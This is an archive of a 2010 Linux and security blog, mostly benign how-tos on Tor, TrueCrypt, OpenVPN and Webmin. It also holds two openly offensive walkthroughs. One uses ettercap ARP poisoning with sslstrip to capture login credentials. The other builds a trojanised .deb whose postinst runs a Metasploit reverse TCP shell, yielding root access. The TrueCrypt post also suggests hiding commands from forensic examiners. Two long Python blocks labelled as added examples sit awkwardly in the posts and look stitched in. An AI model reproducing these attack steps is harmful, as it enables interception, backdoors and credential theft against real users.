Wednesday, March 31, 2010

Hack This Zine

"The mission of HTZ is to research, create and disseminate information, tools, and tactics that empower people to use technology in a way that is liberating. They support and strengthen local communities through education and action. They strive to learn from each other and focus their skills toward creative goals, to explore and research positive hacktivism, and to defend a free internet and free society."
--.:[packetstorm]:.




#9: The Hacktivist Guide to the Internet
Download for Print: pdf
Download for Reading: pdf
txt file: txt

hackbloc

Tuesday, March 30, 2010

Ettercap Revisited - sslstrip

Previously I've worked with ettercap as a network arp poisoning tool, as well as an https hijacking tool to sniff encrypted connections. The downside to using ettercap alone for that job is that most browsers these days will detect a certificate error and at the very least warn the user that something is wrong with the page.

However, there is an alternative: sslstrip. This tool effectively turns every connection the victim makes into a plaintext connection, stripping away their SSL protection and avoiding any certificate error altogether. It does this by handling the SSL connection to the server itself and replacing every instance of https with http on the victim's side.

You can download the sslstrip python script here

You have to setup forwarding and a simple iptables prerouting rule before you begin:

root@zombi:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@zombi:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

The iptables rule simply states that all web traffic (TCP port 80) arriving at your machine, which includes the forwarded traffic from the poisoned victims, is redirected to local port 10000, where sslstrip will be listening.


Fire up ettercap to ARP poison your victims. Here I just mimic the gateway to the whole local network:
root@zombi:~# ettercap -i wlan0 -T -q -M ARP /192.168.168.168/ //

Then run sslstrip:

root@zombi:~/Downloads/sslstrip-0.7# python sslstrip.py -w dump


sslstrip 0.6 by Moxie Marlinspike running...


When your victim(s) visit what is supposed to be a secure page, they are actually interacting with it without any encryption at all, and they will receive no SSL certificate errors. Their only hope is to notice the lack of certain signs, such as the "s" in https or a lock icon, or other indicators depending on their browser. All of the traffic that passes through sslstrip will be saved to the file you specified with the -w flag.

Here's our victim visiting a banking website:



And here's our victim logging into their gmail:



Sure enough, if we check the sslstrip log we see:


root@zombi:~/Downloads/sslstrip-0.7# cat dump
2010-03-30 11:41:28,231 SECURE POST Data (www.google.com):
ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3F&service=mail&rm=false&dsh=-1464906762657940239&ltmpl=default&ltmpl=default&scc=1&GALX=PcWxJ-d1MHk&Email=fakefakefake&Passwd=justanexample&rmShown=1&signIn=Sign+in&asts=

Friday, March 26, 2010

Script: Ubuntu Tor Scripted Install

There are a lot of "How to install Tor on Ubuntu" guides out there, but they all require a bit of familiarity with the OS. To help people who aren't yet comfortable with the terminal or with managing packages get quick access to Tor, I wrote a quick script to automate the process. You can download the script here.

This script follows the basic install guide for Ubuntu 9.10 on the tor website.

Just download the script, then run the following commands:

chmod a+x ubuntu_tor.sh
sudo ./ubuntu_tor.sh

-----------------------------------------------------

#!/bin/bash
#Automatic Tor Installation and local proxy configuration for Ubuntu.
#Version 1.0

if [ "$(id -u)" != "0" ]; then
    echo "This script must be run as root or using sudo"
    exit 1
fi

#Add the Tor project repository for this Ubuntu release (codename from lsb-release)
codename=$(grep CODENAME /etc/lsb-release | cut -d= -f2)
echo "deb http://deb.torproject.org/torproject.org $codename main" >> /etc/apt/sources.list

#Import the Tor repository signing key. When run through sudo, $HOME is still the
#invoking user's home directory, so fetch the key into that user's keyring,
#then export it into apt's trusted keys.
if [ "$HOME" != "/root" ]; then
    user=$(echo "$HOME" | cut -d/ -f3)
    sudo -u "$user" gpg --keyserver keys.gnupg.net --recv 886DDD89
    sudo -u "$user" gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
else
    gpg --keyserver keys.gnupg.net --recv 886DDD89
    gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
fi

apt-get update
apt-get install tor tor-geoipdb polipo vidalia
apt-get remove privoxy

#Use the Tor project's polipo configuration for the local HTTP proxy
wget https://svn.torproject.org/svn/torbrowser/trunk/build-scripts/config/polipo.conf
cp polipo.conf /etc/polipo/config
cp polipo.conf ~/.polipo

#Restart polipo with the new config; Vidalia will start tor itself,
#so stop the system tor service
/etc/init.d/polipo restart
/etc/init.d/tor stop

#Open the Torbutton add-on page, then start Vidalia
firefox https://addons.mozilla.org/en-US/firefox/addon/2275

vidalia

Tuesday, March 23, 2010

Monday, March 22, 2010

Finals Week -- Movie Time

It's a shame having to study random junk for school instead of doing research, but at least I found another neat documentary.

The Rise of Silicon Valley




Friday, March 19, 2010

TrueCrypt - a tactical approach

TrueCrypt is a powerful encryption tool that allows average users to create encrypted files and drives with some of the strongest known encryption algorithms. However, when dealing with some users of TrueCrypt I've found that they tend to make the same mistakes:
  1. One of the best ways to make sure that your encrypted files are never broken into is to never draw attention to them in the first place; however, some users name their TrueCrypt files something obvious, like "truecrypt", "private", "secret", "secure", or "encrypted".
  2. Even if they name it something not so obvious, they make the encrypted volume massive without giving it a legitimate extension. A 10GB file named "stuff" in your home directory will raise suspicion.
  3. They decrypt the files to access them, but then never unmount the encrypted volume... leaving it exposed until the machine is shut down.
  4. Even if they do unmount the volume, they don't have a mechanism for making sure they cleared out running memory.
Solving the first two issues is simple: create a TrueCrypt volume that's a reasonable size for its extension type and name it something innocuous for that file type. For my example, I'll just make a file with the .iso extension, make it anything between 80MB and 3.8GB, and name it as though it were a Linux ISO image.

root@oblivion:~# mkdir ~/Downloads
root@oblivion:~# touch ~/Downloads/linux-alt.iso
root@oblivion:~# truecrypt -t -c
Volume type:
 1) Normal
 2) Hidden
Select [1]: 1

Enter volume path: /root/Downloads/linux-alt.iso

Enter volume size (sizeK/size[M]/sizeG): 120M

When it comes to encryption algorithms, using a two-stage cascade is a good mix of paranoia without losing too much I/O performance. Options 5 and 7 can really seem to slow things down at times.

Encryption algorithm:
 1) AES
 2) Serpent
 3) Twofish
 4) AES-Twofish
 5) AES-Twofish-Serpent
 6) Serpent-AES
 7) Serpent-Twofish-AES
 8) Twofish-Serpent
Select [1]: 8

Hash algorithm:
 1) RIPEMD-160
 2) SHA-512
 3) Whirlpool
Select [1]: 3

Filesystem:
 1) FAT
 2) None
Select [1]: 1


When choosing a password, value length over complexity. A favourite phrase from a book that you haven't repeated to anyone else is a good choice, anything over 16 characters should be sufficient for most people. Remember, if you forget this password the files stored in the Truecrypt volume are likely to be lost forever.
Enter password:
Re-enter password:

Enter keyfile path [none]:

Please type at least 320 randomly chosen characters and then press Enter:
egw9eughrwp9eghrw9euhgw039urht0239urht20935ugh09guh7205049guhweeeguhpwiehrgpweihrwgergeet35y235w235yw235y235yweywerwergwwregowegruthw935uhg0w8yrh08yhy8g08yG)*YG(O*YFG)(*TYFGITUFCYDTESYEAY@YA#%A*SURYDKTfgK%&EDiurDI^$EdiRDI^%$DIRDIDlkGVKFTGKUFITUFO&FROI^FTouTFOUTDFOITdIORDIIITflglidghfhjgfhghurie8d7fr6t43ghjeirfogp;t.r,f.gb;'hb[np;ml.,,,,,.;"{PL<>:POIJHGFDSAQ!@#$%^&*wewtwetwetweh087w2y30rgh4g02r2hg0r(OL:>

Done: 100.000%  Speed:  7.7 MB/s  Left: 0 s

The TrueCrypt volume has been successfully created.



So now we have what appears to be a 120MB Linux ISO in our Downloads folder, which seems perfectly reasonable and likely won't draw any attention, but when mounted holds all of our secret data. You can use other locations and file types; just make sure that the name, extension, and size all make sense together.
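The post's rule is that name, extension and size must agree. As an added example that is not from the post, here is a checker that applies those rules and adds the content test an examiner would run (the ISO 9660 signature at offset 0x8001 and byte entropy), which a TrueCrypt container renamed .iso does not pass; the obvious-name list and the 80MB to 3.8GB range come from the post, while the function names, the 100MB no-extension threshold and the 7.9 entropy cutoff are my own assumptions.

```python
"""Check whether a decoy file would pass as what its name claims.

Added example, not code from the original post. Thresholds marked "from the
post" are the author's; the rest are assumptions for this example.
"""
import math
import os
from collections import Counter

OBVIOUS_NAMES = ("truecrypt", "private", "secret", "secure", "encrypted")  # from the post
ISO_SIZE_RANGE = (80 * 1024**2, int(3.8 * 1024**3))                        # from the post
NO_EXT_LIMIT = 100 * 1024**2   # assumption: big extensionless files draw attention
ISO_MAGIC_OFFSET = 0x8001      # ISO 9660 primary volume descriptor: sector 16, byte 1
RANDOM_CUTOFF = 7.9            # assumption: bits/byte above this looks like ciphertext

def shannon_entropy(data):
    """Bits of entropy per byte: ~8.0 for ciphertext, far lower for a filesystem."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def check_decoy(path, size, head, sample):
    """Return the reasons a file would draw attention (empty list means it blends in).

    path   - file name as it appears on disk
    size   - file size in bytes
    head   - the 5 bytes at offset 0x8001 (an ISO carries b"CD001" there)
    sample - a block of bytes from the file body for the entropy test
    """
    reasons = []
    stem, ext = os.path.splitext(os.path.basename(path).lower())
    if any(word in stem for word in OBVIOUS_NAMES):
        reasons.append("name advertises encrypted content")
    if not ext and size > NO_EXT_LIMIT:
        reasons.append("large file with no extension")
    if ext == ".iso":
        lo, hi = ISO_SIZE_RANGE
        if not lo <= size <= hi:
            reasons.append("size is implausible for a Linux iso")
        if head[:5] != b"CD001":
            reasons.append("no ISO 9660 signature at offset 0x8001")
    if shannon_entropy(sample) > RANDOM_CUTOFF:
        reasons.append("content is uniformly random (ciphertext, not a filesystem)")
    return reasons

def check_file(path, sample_len=65536):
    """Run check_decoy against a real file on disk."""
    size = os.path.getsize(path)
    with open(path, "rb") as f:
        f.seek(ISO_MAGIC_OFFSET)
        head = f.read(5)
        f.seek(0)
        sample = f.read(sample_len)
    return check_decoy(path, size, head, sample)

if __name__ == "__main__":
    # Constructed inputs: a TrueCrypt-style container named like the post's example
    random_body = bytes(range(256)) * 256          # stands in for ciphertext
    for r in check_decoy("linux-alt.iso", 120 * 1024**2, b"\x00" * 5, random_body):
        print("linux-alt.iso:", r)
```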


Problem 3... leaving encrypted volumes mounted after the user is finished with them. Well, if you're lucky, whoever is after your files won't realize you have any encryption and will just pull the plug on the machine, at which point, after a few minutes (see the Cold Boot Attack), everything is fine. However, it would be better to set up a cron job that periodically attempts to auto-unmount all encrypted volumes.

The simple method is of course:
root@oblivion:~# crontab -e
15,30,45,59 * * * * truecrypt -d

This will try to unmount all TrueCrypt volumes every 15 minutes. It is only an attempt, however: if a volume is in use, the unmount will fail and it will try again in 15 minutes.

Wait though, we've just put a reference to TrueCrypt in one of the first places someone analyzing your system is going to look in order to gather information. A better option would be to find a script that's reasonable to run that often, such as a log checker or a security daemon, and hide the truecrypt command inside of it... at least then it won't be quite so obvious, tossed in somewhere around line 80 of a script that looks legitimate.


Problem 4, Wiping memory:
This is a quick script to flush cached memory and thus hopefully make sure your TrueCrypt password or any other sensitive information isn't still sitting in RAM or in the page cache.

root@oblivion:~# cat freemem.sh
#!/bin/bash
#flush filesystem buffers, then ask the kernel to drop the page cache (1),
#dentries and inodes (2), and both (3). This only releases cached file data;
#it does not scrub freed memory, so run it after the volumes are unmounted.
sync
echo 1 > /proc/sys/vm/drop_caches
echo 2 > /proc/sys/vm/drop_caches
echo 3 > /proc/sys/vm/drop_caches

Add this to that same cronjob script that's unmounting your truecrypt volumes, and make sure to run it after you've unmounted volumes yourself.

There are probably more ways to further improve the security of TrueCrypt and lessen its exposure, but following these concepts should give any user a good start.

------
Always remember the wisdom of xkcd.com though...

Wednesday, March 17, 2010

Smoked Glass 6.0.1

Adamz dropped an update for us Droid fans this week, and it's big... tons of new stuff has been added.


http://alldroid.org/threads/16302-ROM.tgz-Smoked-Glass-v6.0.1-*03-15*-(Android-2.1-ESE53)?p=564458#post564458

Having a bash shell rocks. Having spiffy live wallpapers rocks. Having more available modules for this custom kernel... win. I went ahead and wiped data on this one and started fresh with this image and the OTA blocker. (For those of you afraid of wiping /data, it's not a big deal: you re-download your apps, Google remembers which ones you've already paid for, and you re-enter your login info. In a way, it was nice to just get rid of all the extra apps I'd downloaded just to try out.)

Started working on creating a Gentoo chroot system on the sdcard... but I can't get Android to mount the image yet. As soon as I figure out how to get a chroot Gentoo on my Droid, I'll post more about it.


March 15, 2010 (6.0 & 6.0.1 - ESE53)

6.0.1

  • Quick Update for Smoked Glass Only Theme (Transparent Notification Background and Stock Volume/Progress Bars)
  • There is no need to update to this version unless you use the Smoked Glass Only Theme with NO Blue...
6.0
  • Updated to Android Build ESE53 (The Droid 2.1 OTA Update)
  • ALL APKs have been Optimized and Zipaligned to ensure speed
  • All new kernels... with tons of choices (See Smoked Glass Boots for more...)
  • 2.1 Multi-Touch Browser is standard (and works great!)
  • 2.1 Multi-Touch Maps is standard (Either uninstall your current Maps from /data before Installing the ROM, or Uninstall the Maps from the ROM and install from Market if you have issues)
  • 2.1 Multi-Touch Gallery is standard
  • 2.1 Desk Clock is standard (choice to remove during installation)
  • 2.1 News & Weather Widget is standard (choice to remove during installation)
  • 2.1 Voice Search Keyboard is standard
  • Google Goggles App is standard (choice to remove during installation)
  • Live Wallpapers are standard and interactive (with 2.0.1 Launcher)
  • I have customized and included options for the Neural Network Live Wallpaper (Pixel Color & Background)
    • Choice of Neural Network Backgrounds
      • Stock Neural Network Background
      • Nexus One Live Wallpaper Background
    • Choice of Neural Network Pixel Colors
      • Stock Sholes Red
      • Blue
      • Green
      • Red
      • Yellow
      • Nexus (All 4 Colors)
  • Updated the theme for Contacts & Phone (Blue background and dialer updates)
  • Updated the Blue Progress Bars/Volume Bars (Color fades and is not flat)
  • Added more scripts
  • Option to choose 3-Screen 2.0.1 Launcher or 5-screen 2.0.1 Launcher (No A/R, WIP)
  • Options to choose how often your WiFi scans for new networks (to save battery)
  • Options to choose if and how much of an increase in HQ video recording (Bitrate Mb/s)
  • Options to choose to install Wifi Tether to /system or copy to SD Card to install later
  • Options to choose to install Low Brightness App to /system or copy to SD Card to install later
  • Options to choose to install Audio Toggle App to /system or copy to SD Card to install later
  • Option to shorten the ring delay
  • Option to Copy YOUR Custom Ringtones/Notifications from SD Card to your System
  • Option to install Helix Launcher

Saturday, March 13, 2010

Archiving Surveillance Video

Script Time!
One using Bash to archive some files, and one using perl to send email alerts.

Even with my video captures only being triggered by motion, all the cars passing by, windy days, and cats wandering aimlessly around outside cause images and .swf files to build up fast. In the last week I had over 40000 .jpg files, so along with turning down the sensitivity of the motion capture a bit and moving a hanging plant out of the camera's view, I went ahead and made an archive script.

#!/bin/bash
#when archiving, toss the still images, keep the .swf videos.
#find does the deletion in batches because motion can create
#more files than a single rm command line can hold.
find /motion -maxdepth 1 -name '*.jpg' -delete


#make a temp archive folder and drop the videos in it
#(find again, for the same argument-length reason)
mkdir -p /tmp/archv
find /motion -maxdepth 1 -name '*.swf' -exec mv -t /tmp/archv/ {} +


#anything you use more than once should be a variable
#(same Mar13-2010 style stamp as the old date|awk pipeline)
timestamp=$(date +%b%d-%Y)


#build all the videos into a timestamped tarball for storage,
#then check to make sure the new archive was made.
#if it wasn't, leave the tmp folder alone and send an email alert
if tar czvf "archive-$timestamp.tar.gz" /tmp/archv && [ -f "archive-$timestamp.tar.gz" ]
then
  rm -r /tmp/archv
else
  perl /root/mail.pl
fi


#while we're here, just check on the disk usage
#and send an email alert if it's over 50%
usage=$(df -P /dev/sda1 | awk 'NR==2 {sub("%","",$5); print $5}')
if [ "${usage:-0}" -ge 50 ]
then
  /root/useagealert.pl
fi

The two perl scripts that are called are simple mailers, great little templates for interacting with sendmail. Here is an example of one:

#!/usr/bin/perl
use strict;
use warnings;

my $to      = 'me@myaddress.com';
my $from    = 'archive@myserver.org';
my $subject = 'Archive Failed';

## -t tells sendmail to read the recipients from the headers we print
open(my $mail, '|-', '/usr/sbin/sendmail -t') or die "cannot run sendmail: $!";

## Mail Header
print $mail "To: $to\n";
print $mail "From: $from\n";
print $mail "Subject: $subject\n\n";
## Mail Body
print $mail "Archive process failed, please check the logs\n";

close($mail) or die "sendmail exited with an error: $!";

The archive script should then be added to the crontab, mine is set to archive twice a week for now, which will usually give me time to save images if I need to.

Friday, March 12, 2010

Linux: The Code, Parts 1 and 2

First two parts of "The Code", a 2006 documentary on open source software and its use around the globe.

Hooray for more publicly available documentaries.



Networking Cheatsheets

Networking references are useful both for people learning these subjects for the first time and for those of us who just like to have a quick reference handy; cheat-sheets will always have a place in information technology.

Thank you @packet_storm, these are awesome.

These are all from .:[ Packet Storm ]:. , one of my favorite sites.

Wednesday, March 10, 2010

Securing Webmin

If you are a fledgling sysadmin, feeling lazy, or just plain want a GUI and find yourself installing Webmin on your server, please take a few minutes to secure it. I have a few simple examples of how this can be done. A lot of this also applies to other systems, so it's good information to know even if you never plan on running Webmin.

This was done using a Webmin install on Gentoo, but should work the same on Ubuntu or any other distro.

Universal Step 1, Change the default port:
Webmin listens on port 10000 by default, and that is well known: it is a port that scripts and attackers actively look for. So to start, just change the port and reload Webmin. I'll use 54444; use a different one in your own setup.

#vim /etc/webmin/miniserv.conf
...
port=54444
listen=54444
...

#/etc/init.d/webmin restart

It would also be a good idea to at this point, if you hadn't already, add port 10000 to your portsentry rules. (http://www.insecuresystem.org/2010/01/iptables-blacklist.html)


Option, Limit Access with Iptables:
Only allow certain IP addresses or networks to reach the Webmin port and drop all other attempts. I recommend establishing a chain similar to the example below (the target that permits traffic is ACCEPT; iptables has no ALLOW target).

#iptables -N WEBMIN
#iptables -I INPUT 1 -p tcp --dport 54444 -j WEBMIN
#iptables -I INPUT 2 -p udp --dport 54444 -j WEBMIN
#iptables -A WEBMIN -s 192.168.168.0/24 -j ACCEPT
#iptables -A WEBMIN -j DROP

Option, limit it to localhost and access webmin via port-forwarding:

Edit the miniserv.conf file, then restart webmin
#vim /etc/webmin/miniserv.conf
allow=127.0.0.1

Then from any other machine establish an ssh tunnel which forwards the webmin port
#ssh -L 54444:localhost:54444 user@myserver.org

And point your browser at https://localhost:54444

Option, Hide it inside a VPN:
If you establish a simple VPN, then you can use either iptables or the miniserv allow option as above to limit Webmin access to the private VPN subnet only.

Finally:
Webmin has had exploits against it in the past; if you use it, make sure you keep it up to date.


.....

ps:
#/etc/init.d/webmin stop
#emerge --unmerge webmin

Ettercap Plugins

Awesome high quality video from backtrack.it on using some of ettercap's plug-ins to both mess with network traffic, as well as detect if anyone else is trying to. I'll probably be exploring some of these myself soon.



Watch it full screen... with some good speakers for the music.

Sunday, March 7, 2010

A Little Hacker History

As long as this video stays up on Google, hopefully anyone interested can take the time to watch it. This is the history of Kevin Mitnick, of how the media metaphorically crucified him, and a view of the developing environment of the digital age.

Street Art

Normally I'm opposed to graffiti, but this is just too awesome..


I wouldn't mind seeing Tux and other Linux-related art show up around town instead of gang tagging, particularly if the work actually looks good. I have no idea if the above image is real or if it's been shopped at all; I just love the concept, and if it is real I'd love for there to be more.

Don't Talk to the Police

It's apparently a video day, so here's a couple more. These two are both very entertaining.. and may be handy information for people to have, particularly those of us that tend to mess with technology in unusual ways.






Friday, March 5, 2010

Quick VPN

Here is a fast and simple OpenVPN configuration. It has no special features and uses a shared key for access, but you can have a VPN server running in about a minute. I tested it between the Gentoo netbook, my Linode, and a BackTrack install.

On the server:
root@bt:/# cd /etc/openvpn
root@bt:/etc/openvpn# openvpn --genkey --secret quick.key
root@bt:/etc/openvpn# vim quickvpn.conf

  dev tun
  ifconfig 10.0.0.1 10.0.0.2
  secret quick.key

root@bt:/etc/openvpn# scp quick.key root@client.tld:.
root@bt:/etc/openvpn# /etc/init.d/openvpn start

On the client:
root@zombi:/# cp quick.key /etc/openvpn/.
root@zombi:/# cd /etc/openvpn
root@zombi:/etc/openvpn# vim quickvpnclient.conf

  remote vpnserver.tld
  dev tun
  ifconfig 10.0.0.2 10.0.0.1
  secret quick.key

root@zombi:/etc/openvpn# /etc/init.d/openvpn start
root@zombi:/etc/openvpn# ping 10.0.0.1
PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=1.08 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=64 time=1.27 ms
^C

If you actually want to build a more permanent and secure vpn system, the Gentoo wiki has a great guide for that: http://en.gentoo-wiki.com/wiki/OpenVPN

Linux Wireless "Bridge"

As pointed out by a visitor to this site, this is not a "bridge" in the true networking sense as a bridge is a layer 2 device that joins network segments and this is a layer 3 routing setup, but oddly it is still a common term for this sort of device. Technically this is a simple iptables based router, one of the interfaces just happens to be wireless.

---

This keeps coming in handy every so often. It's a simple script to turn a Linux laptop into a router that manages traffic between its wired and wireless interfaces. Today I ended up using it to get networking to a machine in an environment where there were no available ports on the switch to plug into; previously it's been used to provide access to a LAN which had no access to the WAN on its own, but where there was a local wireless network which did.

Run this after establishing a wireless connection and connecting to another machine or switch. It will set up the private Ethernet network, the iptables rules, forwarding, and the DHCP server.

#!/bin/bash
echo "router build for public interface ath0, private interface eth0"
echo "--------------------------------------------------------------"
echo "setting up the wire"
ifconfig eth0 192.168.0.1 netmask 255.255.255.0

echo "building nat for 192.168.0.X network"
iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -o ath0 -j MASQUERADE

echo "setting routes between ethernet and wireless"
iptables -A FORWARD -s 192.168.0.0/24 -o ath0 -j ACCEPT
iptables -A FORWARD -d 192.168.0.0/24 -m state --state ESTABLISHED,RELATED -i ath0 -j ACCEPT

echo "saving"
sh -c "iptables-save > /etc/iptables.rules"

echo 1 > /proc/sys/net/ipv4/ip_forward

echo "success!"
echo "---------------------------------------"
echo "setting up dhcp for eth0"

cat > /etc/dhcpd.conf <<'EOF'
option domain-name-servers 4.2.2.2;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;
authoritative;
log-facility local7;

subnet 192.168.0.0 netmask 255.255.255.0 {
  range 192.168.0.100 192.168.0.254;
  option routers 192.168.0.1;
  option domain-name-servers 4.2.2.2;
}
EOF

dhcpd

echo "dhcpd server running for eth0 network"


So far this has been tested to set up a wireless bridge on Ubuntu 9.10 as well as on multiple Gentoo installs.

Tuesday, March 2, 2010

Build Your Own Trojan, Pt. 2

Not wanting to leave out the Linux side of things, here's a quick run-down of building a Trojan .deb file for targeting ubuntu 9.10 or debian based systems.

Again, this is an attack that exploits users more than any specific system vulnerability. Unfortunately many Linux users, particularly Ubuntu users (a large percentage of whom are new to computers, Linux, or security), tend to be very trusting of others who offer them software or links to resources, and an unscrupulous attacker can take advantage of that.

All an attacker needs is a .deb; we'll use blast, a weird little game that turns your display into Swiss cheese.

root@zombi:/#apt-get install blast

Then make a directory to work in and move the blast package there:

root@zombi:/#mkdir /x
root@zombi:/x# cp /var/cache/apt/archives/blast_1.1-19_amd64.deb .
root@zombi:/x# dpkg -x blast_1.1-19_amd64.deb pkg
root@zombi:/x# mkdir pkg/DEBIAN

Next, make a control file that describes your new package. This can be as fake or realistic as you like, but you must make sure the architecture is set to what your victim will be using (x86 vs amd64). Then add a post-install script that will run the Trojan binary:

root@zombi:/x# cd pkg/DEBIAN/
root@zombi:/x/pkg/DEBIAN# vim control

  Package: Blast
  Version: 0.666
  Section: Games And Amusement
  Priority: Optional
  Architecture: i386
  Maintainer: Deceased
  Description: Tojan Test


root@zombi:/x/pkg/DEBIAN# vim postinst

  #!/bin/sh
  sudo chmod 2755 /usr/games/blast && /usr/games/blast & /usr/games/blast &

root@zombi:/x/pkg/DEBIAN# chmod 755 postinst

Next, set up the payload. This is done just like the Windows Trojan, only using a Linux shell and a normal binary rather than a .exe; after that we build the new Trojan .deb package:
root@zombi:/x/pkg/DEBIAN# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.168.13 LPORT=9999 X > /x/pkg/usr/games/blast

root@zombi:/x/pkg/DEBIAN# dpkg-deb --build /x/pkg
root@zombi:/x# mv pkg.deb blast_0.666.deb

And back to our trusty listener on the attackers machine, again, just like before when exploiting windows:

root@zombi:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.168.13 LPORT=9999 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.168.13:9999
[*] Starting the payload handler...

Now the attacker is all set with their Trojan .deb package and only needs to trick a user into running it. The beauty of this particular vector is that on Debian-based Linux systems a user must install packages as root or using sudo (ironically a security feature), which means that our Trojan will be executed as root.

---Through social engineering or some other method, the user is convinced to run our infected .deb ---

neurophobic@bt:~$ sudo dpkg -i blast_0.666.deb
tar: ./control: time stamp 2010-03-02 11:19:22 is 34.574471421 s in the future
tar: .: time stamp 2010-03-02 11:19:22 is 34.573961287 s in the future
Selecting previously deselected package blast.
(Reading database ... 269350 files and directories currently installed.)
Unpacking blast (from blast_0.666.deb) ...
Setting up blast (0.666) ...

Processing triggers for menu ...
Processing triggers for man-db ...

And the attacker is greeted with a nice little message:
[*] Sending stage (36 bytes)
[*] Sending stage (36 bytes)
[*] Command shell session 2 opened (192.168.168.13:9999 -> 192.168.168.144:52402)

hostname
bt
whoami
root

Today's lesson: stick to software in a trusted repository unless you really trust your source.
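The package installer runs the maintainer scripts as root, so a practitioner who is handed a .deb outside a trusted repository should look at those scripts before dpkg does. As an added example that is not from the original post, here is an inspector that unpacks the outer ar container and the control tarball, and flags the kind of postinst the post shows; the sample .deb is built in-memory and is constructed, and the pattern list, function names and messages are my own.

```python
"""Inspect a .deb's maintainer scripts before letting dpkg run them as root.

Added example, not code from the original post. The .deb built below is a
constructed sample whose postinst mirrors the pattern the post shows.
"""
import io
import re
import tarfile

MAINT_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}
SUSPICIOUS = [  # assumption: heuristics, not a complete list
    (r"\bsudo\b", "calls sudo (maintainer scripts already run as root)"),
    (r"\bchmod\s+[2467]\d{3}\b|\bchmod\s+\S*[ug]\+s", "sets a setuid/setgid bit"),
    (r"(?<![&>])&(?!&)", "backgrounds a command that outlives the install"),
    (r"\b(nc|netcat|ncat|socat|wget|curl)\b", "uses a network client"),
]

def ar_members(blob):
    """Yield (name, data) from an ar archive, which is the outer .deb format."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("bad ar member header")
        name = hdr[0:16].decode().rstrip(" /")      # GNU ar appends '/' to names
        size = int(hdr[48:58].decode().strip())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)               # members are 2-byte aligned

def inspect_deb(blob):
    """Return (control fields, findings) for a .deb given as bytes."""
    control, findings = {}, []
    for name, data in ar_members(blob):
        if not name.startswith("control.tar"):     # r:* handles gz/bz2/xz, not zst
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
            for m in tf.getmembers():
                if not m.isfile():
                    continue
                base = m.name.lstrip("./")
                text = tf.extractfile(m).read().decode("utf-8", "replace")
                if base == "control":
                    for line in text.splitlines():
                        if ":" in line:
                            k, v = line.split(":", 1)
                            control[k.strip()] = v.strip()
                elif base in MAINT_SCRIPTS:
                    findings.append((base, "maintainer script will run as root"))
                    for pattern, why in SUSPICIOUS:
                        if re.search(pattern, text, re.M):
                            findings.append((base, why))
    return control, findings

def _tar_gz(files):
    """Build an in-memory tar.gz from {path: (mode, bytes)} (for the sample)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, (mode, data) in files.items():
            ti = tarfile.TarInfo("./" + path)
            ti.size, ti.mode = len(data), mode
            tf.addfile(ti, io.BytesIO(data))
    return buf.getvalue()

def _ar(members):
    """Build an ar archive from [(name, bytes)] (for the sample)."""
    out = bytearray(b"!<arch>\n")
    for name, data in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        out += data + (b"\n" if len(data) & 1 else b"")
    return bytes(out)

# Constructed sample mirroring the post's control file and postinst
CONSTRUCTED_CONTROL = b"Package: blast\nVersion: 0.666\nArchitecture: i386\nMaintainer: Deceased\n"
CONSTRUCTED_POSTINST = (b"#!/bin/sh\nsudo chmod 2755 /usr/games/blast && "
                        b"/usr/games/blast & /usr/games/blast &\n")

def build_sample_deb(postinst=CONSTRUCTED_POSTINST):
    """Assemble a minimal .deb: debian-binary, control.tar.gz, data.tar.gz."""
    control_tgz = _tar_gz({"control": (0o644, CONSTRUCTED_CONTROL),
                           "postinst": (0o755, postinst)})
    data_tgz = _tar_gz({"usr/games/blast": (0o755, b"not-a-real-binary")})
    return _ar([("debian-binary", b"2.0\n"),
                ("control.tar.gz", control_tgz),
                ("data.tar.gz", data_tgz)])

if __name__ == "__main__":
    control, findings = inspect_deb(build_sample_deb())
    print("Package:", control.get("Package"), "Maintainer:", control.get("Maintainer"))
    for script, why in findings:
        print(f"  {script}: {why}")
```

For a real file, pass `open(path, "rb").read()` to `inspect_deb`; the same inspection applies to the Windows side of this series only in spirit, since .exe installers have no equivalent of a readable maintainer script.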

Monday, March 1, 2010

Smoked Glass Rom 5.0.1 ... and CM?

I missed this update; it's downloading now. Adamz finally has the Smoked Glass ROM in a format that works with the standard flashing system... and it's now version 5, dude works fast. This is a huge update and I'm looking forward to messing with it.

http://alldroid.org/viewtopic.php?f=311&t=2853

February 27, 2010 (5.0 & 5.0.1)
5.0.1
- Just a really quick update. I added the Beta 3 version of 2.1 Launcher (Greek35T). Even less issues!
5.0
*** Largest update is the ROM format... you get complete customization. Make the ROM your own!
- Options to Wipe Data and Wipe Data & keep Apps
- Options to Wipe Cache
- Option to copy HTC IME Keyboard to SD Card (thanks to jonasl at XDA)
- New version of 2.1 Launcher - Fixes Landscape and less FCing (thanks to Greek35T)
- Fixed issue of speed and FCing of 2.0.1 Launcher... sorry about that.
- Live Wallpapers (Interactive with Launcher2) (thanks to xeudoxus)
- 2.0 Lockscreen Vibrate Hack (Lockscreen will take you to vibrate... Long-press of power will silence)
- Two options for boot.img... 250-1100 MHz and 250-800 MHz.
- Option to choose which ROM from installation - Full Theme, Full with Blue Clock/Notifications, and Glass Only Theme
